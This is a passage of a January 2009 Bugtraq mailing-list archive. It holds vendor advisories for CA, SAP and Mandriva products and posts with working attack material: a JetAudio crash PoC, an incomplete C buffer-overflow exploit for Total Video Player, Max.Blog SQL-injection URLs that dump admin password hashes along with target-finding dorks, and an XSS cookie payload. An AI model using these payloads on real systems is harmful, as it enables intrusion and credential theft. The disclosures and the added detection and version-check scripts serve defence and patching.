1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the 
   "C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is 
   vulnerable.


Workaround: None


References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090123-01: Security Notice for Cohesion Tomcat
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197540
Solution Document Reference APARs:
RO04648
CA Security Response Blog posting:
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx
Reported By: 
n/a
CVE References:
CVE-2005-2090
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090
CVE-2005-3510
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510
CVE-2006-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835
CVE-2006-7195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195
CVE-2006-7196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196
CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
CVE-2007-1355
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355
CVE-2007-1358
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358
CVE-2007-1858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858
CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
CVE-2007-3385 *
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
CVE-2008-0128
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128
*Note: the issue was not completely fixed by Tomcat maintainers.
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release
v1.1 - Updated Impact, Summary, Affected Products


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your 
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.

From - Tue Jan 27 11:48:38 2009
Date: 27 Jan 2009 06:21:33 -0000
Message-ID: <20090127062133.12723.qmail@securityfocus.com>
From: alphanix00@gmail.com
To: bugtraq@securityfocus.com
Subject: JetAudio Basic 7.0.3 BufferOverFlow PoC

#!/usr/bin/python
#By ALpHaNiX
#NullArea.Net

# proofs of concept
#EAX FFFFFFFF
#ECX 41414141
#EDX 00000001
#EBX 7FFD3000
#ESP 04ECFD8C
#EBP 04ECFDBC
#ESI 041F8648
#EDI 41414141
#EIP 7711737D kernel32.7711737D
#ESI & EDI Overwritten


print "[+] JetAudio Basic 7.0.3 BufferOverFlow PoC"
lol="alpix.m3u"
file=open(lol,'w')
file.write("\x41"*1065987)
file.close()
print "[+]",lol,"File created "

From - Tue Jan 27 11:58:38 2009
Message-ID: <497ECC64.6000402@csnc.ch>
Date: Tue, 27 Jan 2009 09:57:08 +0100
From: Martin Suess <martin.suess@csnc.ch>
To: bugtraq@securityfocus.com
Subject: SAP NetWeaver XSS Vulnerability

#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:   NetWeaver/Web DynPro
# Vendor:    SAP (www.sap.com)
# CVD ID:    CVE-2008-3358
# Subject:   Cross-Site Scripting Vulnerability
# Risk:      High
# Effect:    Remotely exploitable
# Author:    Martin Suess <martin.suess@csnc.ch>
# Date:      January 27th 2009
#
#############################################################

Introduction:
-------------
The vulnerability found targets the SAP NetWeaver portal. It is
possible to execute JavaScript code in the browser of a valid user
when clicking on a specially crafted URL which can be sent to the
user by email.
This vulnerability can be used to steal the user's session cookie or
redirect him to a phishing website which shows the (faked) login
screen and gets his logon credentials as soon as he tries to log in
on the faked site.

Affected:
---------
- All tested versions that are vulnerable
SAP NetWeaver/Web DynPro
[for detailed Information, see SAP Notification 1235253]

Description:
------------
A specially crafted URL in SAP NetWeaver allows an attacker to
launch a Cross-Site Scripting attack. The resulting page contains
only the unfiltered value of the vulnerable parameter. It is possible
to create a URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:

HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout, maxP0
Connection: Keep-Alive

<html><title>test</title><body onload="alert(document.cookie)">
</body></html>

The code only gets executed in Microsoft Internet Explorer (tested
with version 7.0.5730 only). In Firefox (tested with version 3.0
only) it did not get executed as the content-type header of the
server response is interpreted more strictly (text/plain).

SAP Information Policy:
-----------------------
The information is available to registered SAP clients only (SAP
Security Notes).

Patches:
--------
Apply the latest SAP security patches for Netweaver. For more detailed
patch information, see SAP notification number 1235253.

Timeline:
---------
Vendor Status: Patch released
Vendor Notified: July 21st 2008
Vendor Response: July 28th 2008
Patch available: October 2008
Advisory Release: January 27th 2009

References:
-----------
- SAP Notification 1235253 (problem and patches)

From - Tue Jan 27 11:58:38 2009
Date: 27 Jan 2009 15:02:39 -0000
Message-ID: <20090127150239.29410.qmail@securityfocus.com>
From: maroc-anti-connexion@hotmail.com
To: bugtraq@securityfocus.com
Subject: Total video player 1.3.7 local buffer overflow universal exploit

/*simo36.tvp-bof.c
Authour : SimO-s0fT
Home : www.exploiter-ma.com
greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
bahjawi danger khod nasi7a 
 


EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 00004141
EDX 00340608
EBX 41414141
ESP 0012BF44
EBP 0012C160
ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 41414141
EIP 7C92B3FB ntdll.7C92B3FB



*/


#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

#define OFFSET 549
char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46"
"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47"
"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20"
"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c";





int main(int argc,char *argv[]){
    FILE *openfile;
    unsigned char *buffer;
    unsigned int offset=0;
    unsigned int RET=0x7c85d568;
    int number=0;
                 printf("*********************************************************\n");
                 printf("Total Video Player local universal buffer overflow exploit\n");
                 printf("Cded by SimO-s0fT(simo@exploiter-ma.com)");
                 printf("greetz : to Allah \n");
                 printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
                 printf("***********************************************************\n"); 
    scanf("%d",&number);
    if((openfile=fopen(argv[1],"wb"))==NULL){
                                            perror("connot opening .....!!\n");
                                            exit(0);
                                            }
    switch(number){
                   case 1:                  buffer =  (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET));
                                            memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET));
                                            offset=OFFSET;
                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
                                            offset+=sizeof(RET);
                                            memcpy(buffer+offset,scode1,strlen(scode1));
                                            offset+=strlen(scode1);
                                            fputs(twacha,openfile);
                                            fputs(buffer,openfile);
                                            fclose(openfile);
                                            printf("File created ....!\n"
                                                         "open it with tvp\n");
                                            break;
                                            
                   case 2:                  buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET));
                                            memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET));
                                            offset = OFFSET;
                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
                                            offset+=sizeof(RET);
                                            memcpy(buffer+offset,scode2,strlen(scode2));
                                            offset=strlen(scode2);
                                            fputs(twacha,openfile);
                                            fputs(buffer,openfile);
                                            fclose(openfile);
                                            printf("File created ....!\n"
                                                         "open it with tvp\n");
                                            break;
                   }
                   
    free(buffer);
    return 0;
}

    
        
    

From - Tue Jan 27 12:08:38 2009
Subject: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Date: Tue, 27 Jan 2009 10:08:01 -0500
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204063DC155@USILMS12.ca.com>
From: "Williams, James K" <James.Williams@ca.com>
To: <bugtraq@securityfocus.com>

Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion 
Multiple Vulnerabilities


CA Advisory Reference: CA20090126-01


CA Advisory Date: 2009-01-26


Reported By:
Thierry Zoller and Sergio Alvarez of n.runs AG


Impact: A remote attacker can evade detection.


Summary: The CA Anti-Virus engine contains multiple 
vulnerabilities that can allow a remote attacker to evade 
detection by the Anti-Virus engine by creating a malformed archive 
file in one of several common file archive formats. CA has 
released a new Anti-Virus engine to address the vulnerabilities. 
The vulnerabilities, CVE-2009-0042, are due to improper handling 
of malformed archive files by the Anti-Virus engine. A remote 
attacker can create a malformed archive file that potentially 
contains malware and evade anti-virus detection.

Note: After files have been extracted from an archive, the desktop 
Anti-Virus engine is able to scan all files for malware. 
Consequently, detection evasion can be a concern for gateway 
anti-virus software if archives are not scanned, but the risk is 
effectively mitigated by the desktop anti-virus engine.


Mitigating Factors: See note above.


Severity: CA has given these vulnerabilities a Low risk rating.


Affected Products:
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, 
   r8, r8.1
CA Anti-Virus 2007 (v8), 2008
eTrust EZ Antivirus r7, r6.1
CA Internet Security Suite 2007 (v3), 2008
CA Internet Security Suite Plus 2008
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) r8, 8.1
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
CA Protection Suites r2, r3, r3.1
CA Secure Content Manager (formerly eTrust Secure Content 
   Manager) 8.0, 8.1
CA Anti-Spyware for the Enterprise (Formerly eTrust 
   PestPatrol) r8, 8.1
CA Anti-Spyware 2007, 2008
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r3.0, r3.1, r11, r11.1
CA ARCserve Backup r11.1, r11.5, r12 on Windows
CA ARCserve Backup r11.1, r11.5 Linux
CA ARCserve client agent for Windows
CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0
CA Common Services (CCS) r11, r11.1
CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)


Non-Affected Products:
CA Anti-Virus engine with arclib version 7.3.0.15 installed


Affected Platforms:
Windows
UNIX
Linux
Solaris
Mac OS X
NetWare


Status and Recommendation:
CA released arclib 7.3.0.15 in September 2008.  If your product is 
configured for automatic updates, you should already be protected, 
and you need to take no action.  If your product is not configured 
for automatic updates, then you simply need to run the update 
utility included with your product.


How to determine if you are affected:

For products on Windows:

1. Using Windows Explorer, locate the file "arclib.dll". By 
   default, the file is located in the 
   "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is earlier than indicated below, the 
   installation is vulnerable.

File Name    File Version
arclib.dll   7.3.0.15

*For eTrust Intrusion Detection 2.0 the file is located in 
"Program Files\eTrust\Intrusion Detection\Common", and for eTrust 
Intrusion Detection 3.0 and 3.0 sp1, the file is located in 
"Program Files\CA\Intrusion Detection\Common".

For CA Anti-Virus r8.1 on non-Windows platforms:

Use the compver utility provided on the CD to determine the 
version of Arclib. If the version is less than 7.3.0.15, the 
installation is vulnerable. 

Example compver utility output:
     ------------------------------------------------
     COMPONENT NAME                           VERSION
     ------------------------------------------------
     eTrust Antivirus Arclib Archive Library  7.3.0.15
     ... (followed by other components)

For reference, the following are file names for arclib on 
non-Windows operating systems:

Operating System    File name
Solaris             libarclib.so
Linux               libarclib.so
Mac OS X            arclib.bundle


Workaround: 
Do not open email attachments or download files from untrusted 
sources.


References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090126-01: Security Notice for CA Anti-Virus Engine
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601
Solution Document Reference APARs:
n/a
CA Security Response Blog posting:
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple 
Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx
Reported By: 
Thierry Zoller and Sergio Alvarez of n.runs AG
http://www.nruns.com/
http://secdev.zoller.lu
CVE References:
CVE-2009-0042 - Anti-Virus detection evasion
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your 
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.
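
An added example, not part of CA's advisory: the version test from the "How to determine if you are affected" steps, applied to compver output shaped like the advisory's sample. The function names and the 7.3.0.9 sample are constructed for illustration; the comparison is numeric per component because a plain string comparison ranks 7.3.0.9 above 7.3.0.15.

```python
import re

# Fixed arclib version and component name, both taken from the advisory.
FIXED_ARCLIB = (7, 3, 0, 15)
ARCLIB_COMPONENT = "Arclib Archive Library"

# Constructed sample: same layout as the advisory's compver example.
SAMPLE_FIXED = """\
     ------------------------------------------------
     COMPONENT NAME                           VERSION
     ------------------------------------------------
     eTrust Antivirus Arclib Archive Library  7.3.0.15
"""

# Constructed sample: an older build number chosen for illustration.
SAMPLE_OLD = SAMPLE_FIXED.replace("7.3.0.15", "7.3.0.9")


def parse_version(text):
    """Turn '7.3.0.15' into (7, 3, 0, 15); reject anything else."""
    if not re.fullmatch(r"\d+(\.\d+)*", text):
        raise ValueError(f"not a dotted version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def is_older(found, fixed=FIXED_ARCLIB):
    """Numeric, component-wise comparison; shorter versions are zero-padded."""
    width = max(len(found), len(fixed))
    found = found + (0,) * (width - len(found))
    fixed = fixed + (0,) * (width - len(fixed))
    return found < fixed


def arclib_version_from_compver(output):
    """Return the Arclib version tuple from compver output, or None if absent."""
    for line in output.splitlines():
        if ARCLIB_COMPONENT.lower() in line.lower():
            # The version is the last whitespace-separated column.
            return parse_version(line.split()[-1])
    return None


def assess(output):
    """Classify one host's compver output against the fixed version."""
    version = arclib_version_from_compver(output)
    if version is None:
        return "unknown"
    return "vulnerable" if is_older(version) else "not vulnerable"


if __name__ == "__main__":
    for label, sample in (("fixed", SAMPLE_FIXED), ("old", SAMPLE_OLD)):
        print(label, "->", assess(sample))
```
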

From - Tue Jan 27 12:18:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d21
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39310-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9518CED883
for <lists@securityspace.com>; Tue, 27 Jan 2009 12:16:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C5433237840; Tue, 27 Jan 2009 08:22:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3037 invoked from network); 27 Jan 2009 15:01:04 -0000
MIME-Version: 1.0
Date: Tue, 27 Jan 2009 16:27:06 +0100
Message-ID: <48317b000901270727s6c0889aev3090ab24fb534984@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

############################################################################

- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)

http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################


-- 
Salvatore "drosophila" Fresta
CWNP444351

From - Tue Jan 27 14:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d22
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39311-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 938D8ED8A6
for <lists@securityspace.com>; Tue, 27 Jan 2009 14:01:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E2C19143773; Tue, 27 Jan 2009 11:51:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5954 invoked from network); 27 Jan 2009 15:38:10 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=V9pN_vKMTjsYsVUAaSgA:9 a=1KzNd32ZXwaiil2vAlIA:7 a=iNj5OGtY_VId37t__GrlwVuDUTMA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:030 ] amarok
Date: Tue, 27 Jan 2009 09:11:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LRqWi-0001fz-Ty@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:030
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : amarok
 Date    : January 26, 2009
 Affected: 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Data length values in the metadata of an Audible Audio media file (.aa)
 can lead to an integer overflow, enabling remote attackers to trigger a
 heap overflow and making it possible to execute arbitrary code
 (CVE-2009-0135).
 
 Failure to check heap allocation on Audible Audio media files
 (.aa) allows remote attackers either to cause denial of service or
 execute arbitrary code via a crafted media file (CVE-2009-0136).
 
 This update provides the fix for these security issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136
 _______________________________________________________________________

 Updated Packages:

 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJfwXHmqjQ0CJFipgRAq8+AJwMdbJCzad1KwNPcu+/ED1ry9VaMQCfd2WN
gnrxNsGlZ3cgoABesY1q0DE=8/6v
-----END PGP SIGNATURE-----

From - Tue Jan 27 16:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d23
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39312-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0E943ED73B
for <lists@securityspace.com>; Tue, 27 Jan 2009 16:00:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 15E4F236FC2; Tue, 27 Jan 2009 13:42:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19688 invoked from network); 27 Jan 2009 20:21:49 -0000
MIME-Version: 1.0
Date: Tue, 27 Jan 2009 21:47:56 +0100
Message-ID: <48317b000901271247j3cf9ae7kb4dff59f84beffe4@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

############################################################################

- BUGS

SQL Injection:

Requisites: magic quotes = off

File affected: submit_post.php

This bug allows a registered user to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)

http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351
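
An added example, not part of either Max.Blog post: a detection pass over web server access logs for the two GET parameters named in the posts above (id on show_post.php, draft on submit_post.php). It assumes both parameters are numeric record ids in normal use, so any value that is not a plain non-negative integer is flagged; the log lines are constructed, in Common Log Format, with documentation IP addresses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> parameter named in the two advisories. Treating these
# parameters as integer-only is an assumption of this example.
WATCHED = {"show_post.php": "id", "submit_post.php": "draft"}

# Common Log Format: ip ident user [time] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLAIN_INT = re.compile(r"\d{1,10}")

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jan/2009:16:30:01 +0100] "GET /path/show_post.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [27/Jan/2009:16:31:12 +0100] "GET /path/show_post.php?id=-1%27+UNION+ALL+SELECT+1%23 HTTP/1.1" 200 731',
    '203.0.113.7 - - [27/Jan/2009:16:32:40 +0100] "GET /path/submit_post.php?draft=7 HTTP/1.1" 200 2048',
    "198.51.100.9 - - [27/Jan/2009:16:33:05 +0100] \"GET /path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL%23 HTTP/1.1\" 200 640",
    '203.0.113.7 - - [27/Jan/2009:16:34:00 +0100] "GET /path/index.php?id=abc HTTP/1.1" 200 900',
    'truncated or malformed line',
]


def suspicious_params(target):
    """Return (name, decoded value) pairs that break the integer-only rule."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return []
    hits = []
    # parse_qsl percent-decodes and maps '+' to space, so an encoded quote
    # (%27) is inspected in the same form the application would receive it.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == param and not PLAIN_INT.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Scan log lines and return one finding per offending parameter."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line; skip rather than guess
        for name, value in suspicious_params(match["target"]):
            findings.append({
                "line": number,
                "ip": match["ip"],
                "status": int(match["status"]),
                "param": name,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only shows that the page was served; whether data was returned has to be judged from response size and the application's own logs.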

From - Wed Jan 28 11:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d39
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39313-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F3B39ED87D
for <lists@securityspace.com>; Wed, 28 Jan 2009 11:02:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C3837236FDB; Wed, 28 Jan 2009 08:44:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20941 invoked from network); 27 Jan 2009 20:47:49 -0000
MIME-Version: 1.0
Date: Tue, 27 Jan 2009 22:13:59 +0100
Message-ID: <48317b000901271313r3092f7b0pa540daece999172d@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * Offline Authentication Bypass
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

